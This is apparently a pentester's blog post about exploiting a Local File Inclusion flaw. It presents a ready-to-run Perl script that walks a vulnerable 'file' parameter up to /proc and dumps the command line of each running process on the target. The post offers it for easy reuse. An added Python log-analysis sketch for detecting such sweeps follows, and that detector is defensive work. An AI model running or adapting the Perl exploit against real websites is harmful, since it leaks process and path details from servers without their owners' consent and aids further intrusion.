This week during a pentest I discovered a website vulnerable to Local File Inclusion. As I wanted to discover as much information as possible about the system, I decided to retrieve the running processes and the command lines used to execute these programs. With this I intended to discover more services and paths in the system.
I wrote a very simple Perl program that can be adapted very easily to other scenarios :)
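Enjoy!

    #!/usr/bin/perl -w
    use strict;
    use LWP::UserAgent;

    my $browser = LWP::UserAgent->new;
    # Vulnerable file parameter, traversing up to /proc/
    my $url = 'https://URL/load?file=../../proc/';

    # Request /proc/<pid>/cmdline for each candidate PID
    for (my $i = 0; $i < 9500; $i++) {
        my $response = $browser->get($url . $i . "/cmdline");
        # Print only the PIDs that returned a non-empty body
        if ($response->content !~ m/^$/i) {
            print $i . " : " . $response->content . "\n";
        }
    }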
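On the defending side, the sweep above leaves a distinctive trail in the web server's access log: one client requesting `/proc/<pid>/cmdline` through a file parameter for many PIDs in a row. The following detection sketch is an added example, not part of the original post; the log lines are constructed, and the combined log format and the threshold of three distinct PIDs are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (combined format); hosts and paths are made up.
SAMPLE_LOG = '''\
203.0.113.7 - - [12/Mar/2024:10:00:01 +0000] "GET /load?file=../../proc/1/cmdline HTTP/1.1" 200 11 "-" "libwww-perl/6.05"
203.0.113.7 - - [12/Mar/2024:10:00:01 +0000] "GET /load?file=../../proc/2/cmdline HTTP/1.1" 200 0 "-" "libwww-perl/6.05"
203.0.113.7 - - [12/Mar/2024:10:00:02 +0000] "GET /load?file=../../proc/3/cmdline HTTP/1.1" 200 0 "-" "libwww-perl/6.05"
203.0.113.7 - - [12/Mar/2024:10:00:09 +0000] "GET /load?file=../../proc/812/cmdline HTTP/1.1" 200 27 "-" "libwww-perl/6.05"
198.51.100.20 - - [12/Mar/2024:10:01:30 +0000] "GET /load?file=report.pdf HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Mar/2024:10:02:10 +0000] "GET /load?file=..%252f..%252fproc%252f1%252fcmdline HTTP/1.1" 404 153 "-" "Mozilla/5.0"
'''

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) (\d+|-)')
PROC_RE = re.compile(r'(?:^|/)proc/(\d+)/(\w+)')  # a parameter value that reaches /proc/<pid>/<file>


def proc_probes(lines):
    """Yield (client, pid, proc_file, status, size) for each request whose query reaches /proc/<pid>/."""
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status, size = m.groups()
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            # parse_qsl decodes once; decode again so double-encoded separators are seen too.
            hit = PROC_RE.search(unquote(value).replace("\\", "/"))
            if hit:
                yield client, int(hit.group(1)), hit.group(2), int(status), int(size) if size.isdigit() else 0


def detect_sweeps(lines, min_pids=3):
    """Return {client: {"pids": n, "leaked": m}} for clients probing at least min_pids distinct PIDs."""
    probed, leaked = defaultdict(set), defaultdict(set)
    for client, pid, _file, status, size in proc_probes(lines):
        probed[client].add(pid)
        if status == 200 and size > 0:  # a non-empty 200 means the file content went out
            leaked[client].add(pid)
    return {c: {"pids": len(p), "leaked": len(leaked[c])} for c, p in probed.items() if len(p) >= min_pids}


if __name__ == "__main__":
    for client, stats in detect_sweeps(SAMPLE_LOG.splitlines()).items():
        print(f"{client}: probed {stats['pids']} PIDs, {stats['leaked']} non-empty responses")
```

The "leaked" count mirrors the script's own filter: a PID with a non-empty 200 response is one whose command line was actually disclosed, which is the list to review during incident response.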